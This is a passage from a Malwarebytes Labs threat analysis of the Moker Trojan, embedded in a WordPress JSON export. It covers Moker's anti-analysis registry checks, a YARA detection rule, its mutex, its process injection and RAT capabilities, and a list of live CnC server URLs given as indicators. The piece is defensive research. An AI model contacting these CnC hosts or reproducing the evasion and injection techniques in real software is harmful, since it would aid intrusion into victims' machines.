searched:<\/p>\n<pre>\"HKEY_LOCAL_MACHINE\\HARDWARE\\ACPI\\DSDT\\VBOX__\"\n\"HKEY_CURRENT_USER\\Software\\Trusteer\\Rapport\"\n\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" -&gt; SysAnalyzer<\/pre>\n<p>If all the checks pass, the application reads its own file from the disk and searches there for some typical markers. 
An example of the search:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17644\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers.png\" alt=\"\" width=\"448\" height=\"227\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers.png 448w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers-300x152.png 300w\" sizes=\"auto, (max-width: 448px) 100vw, 448px\" \/><\/p>\n<p>The important thing is, those markers are present in the outermost layer &#8211; the original PE file (not the unpacked one). Thanks to this feature, knowing them allowed us to create a very simple YARA rule to identify Moker:<\/p>\n<pre>rule MokerTrojan\n{\n    strings:\n        $key = {3D FF 24 8B 92 C1 D6 9D}\n    condition:\n        IsPE and all of them\n}<\/pre>\n<p>The markers serve as indicators: the encrypted CnC address is stored right after them.<\/p>\n<p>Another feature typical of Moker is a mutex in the following format:<\/p>\n<pre>\"Global\\a0bp-&lt;Machine_ID&gt;\"<\/pre>\n<p>The mutex prevents the application from being run more than once.<\/p>\n<p>After the environment checks are passed, Moker unpacks the shellcode, which has the capabilities of a downloader, and injects it (along with the initial PE file) into <em>svchost<\/em>.<\/p>\n<h4>Stage 2<\/h4>\n<p>If the main DLL was successfully downloaded by <em>Stage 1<\/em>, it is then injected into other applications. 
Example &#8211; Moker DLL injected into jusched (Java Update Scheduler):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17316\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected.png\" alt=\"\" width=\"639\" height=\"350\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected.png 639w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected-300x164.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected-600x329.png 600w\" sizes=\"auto, (max-width: 639px) 100vw, 639px\" \/><\/p>\n<p>This module is responsible for all the malicious actions performed by the malware &#8211; also, it actively communicates with its CnC. Below you can see a sample POST request sent from inside the injected DLL:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17485\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post.png\" alt=\"\" width=\"577\" height=\"280\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post.png 577w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post-300x146.png 300w\" sizes=\"auto, (max-width: 577px) 100vw, 577px\" \/><\/p>\n<p>If we try to dump the injected DLL, we can see that its import table has been destroyed &#8211; all the names of the DLLs and imported functions are erased. 
However, using <a href=\"https:\/\/github.com\/hasherezade\/pe_recovery_tools\/tree\/master\/imports_unerase\" target=\"_blank\">a dedicated tool<\/a> I was able to recover it (see more <a href=\"https:\/\/www.youtube.com\/watch?v=FRn121kK92E\" data-rel=\"lightbox-video-0\" target=\"_blank\">here<\/a>).<\/p>\n<p>The DLL provides various features typical for a RAT (they didn&#8217;t change since the latest analysis from 2015, provided <a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/\" target=\"_blank\">here<\/a>).<\/p>\n<p>The code of the core DLL is written in a decent way, suggesting the professionalism of the authors. However, in contrast to the dropper, the obfuscation used here is rather simple. Most of the strings and API calls are either not obfuscated at all or obfuscated in a trivial way.<\/p>\n<p>Looking inside the code, we can see references to the registry keys observed during behavioral analysis, e.g.:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17649\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6.png\" alt=\"\" width=\"757\" height=\"358\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6.png 757w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6-300x142.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6-600x284.png 600w\" sizes=\"auto, (max-width: 757px) 100vw, 757px\" \/><\/p>\n<p>The DLL communicates not only with the CnC, but also with its other injected modules, using local sockets and named pipes. 
An example below &#8211; opening a local socket and listening on it:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17651\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen.png\" alt=\"\" width=\"442\" height=\"528\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen.png 442w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen-251x300.png 251w\" sizes=\"auto, (max-width: 442px) 100vw, 442px\" \/><\/p>\n<p>The commands read from the pipe are parsed and executed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17652\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe.png\" alt=\"\" width=\"914\" height=\"184\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe.png 914w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe-300x60.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe-600x121.png 600w\" sizes=\"auto, (max-width: 914px) 100vw, 914px\" \/><\/p>\n<p>Based on the command ID, the malware can be requested over the pipe to execute a command or to create and save a screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17650\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj.png\" alt=\"\" width=\"688\" height=\"404\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj.png 688w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj-300x176.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj-600x352.png 600w\" sizes=\"auto, (max-width: 688px) 100vw, 688px\" \/><\/p>\n<p>Among the interesting features of this module is that it also provides access to its functionality via a simple GUI. 
It may be used for local tests, or in case the attackers prefer to access the victim machine via Remote Desktop.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17637\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons.png\" alt=\"\" width=\"970\" height=\"161\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons.png 970w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-300x50.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-600x100.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-965x161.png 965w\" sizes=\"auto, (max-width: 970px) 100vw, 970px\" \/><\/p>\n<h3>CnC servers<\/h3>\n<p>List of the CnC servers found (one address per sample):<\/p>\n<pre>http:\/\/bitmixc.ml\/nnnn04722.php\nhttp:\/\/bitmixc.ml\/msnwiwoq25.php\nhttp:\/\/matthi.tk\/abb6a388.php\nhttp:\/\/sally33.cf\/23mmmdw3.php\nhttp:\/\/siri5.ml\/www9.php<\/pre>\n<h3>Conclusion<\/h3>\n<p>Moker is a rare malware, but one written by very skilled authors. The compilation timestamp of the core module is <em>2015-05-03 00:40:11<\/em>. This\u00a0suggests that the same samples have been in circulation since the moment of their appearance, only repacked by different packers. 
This fact, along with its RAT capabilities, suggests that it may be a tool produced and sold in 2015, possibly abandoned by the original developers.<\/p>\n<h3>Appendix<\/h3>\n<p><a href=\"http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network\" target=\"_blank\">http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network<\/a> &#8211; Ensilo on Moker (from 2015)<\/p>\n<p><a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-1-dissecting-a-new-apt-under-the-microscope\/\" target=\"_blank\">https:\/\/breakingmalware.com\/malware\/moker-part-1-dissecting-a-new-apt-under-the-microscope\/<\/a> &#8211; part 1<\/p>\n<p><a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/\" target=\"_blank\">https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/<\/a> &#8211; part 2<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/\">Elusive Moker Trojan is back<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Fri, 21 Apr 2017 18:44:58 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/' title='Elusive Moker Trojan is back'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/pexels-photo-132461.jpeg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>We have finally gotten our hands on a sample of Moker Trojan (that was discovered in 2015). 
This article will be a deep dive in its capabilities.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/ek\/\" rel=\"tag\">EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit-kit\/\" rel=\"tag\">exploit kit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malware\/\" rel=\"tag\">malware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/moker\/\" rel=\"tag\">Moker<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rat\/\" rel=\"tag\">rat<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rig-ek\/\" rel=\"tag\">RIG EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/trojan\/\" rel=\"tag\">trojan<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/' title='Elusive Moker Trojan is back'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/\">Elusive Moker Trojan is back<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes 
Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10527,10534,3764,12055,1810,11792,10494,10833],"class_list":["post-7411","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-ek","tag-exploit-kit","tag-malware","tag-moker","tag-rat","tag-rig-ek","tag-threat-analysis","tag-trojan"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7411"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7411\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}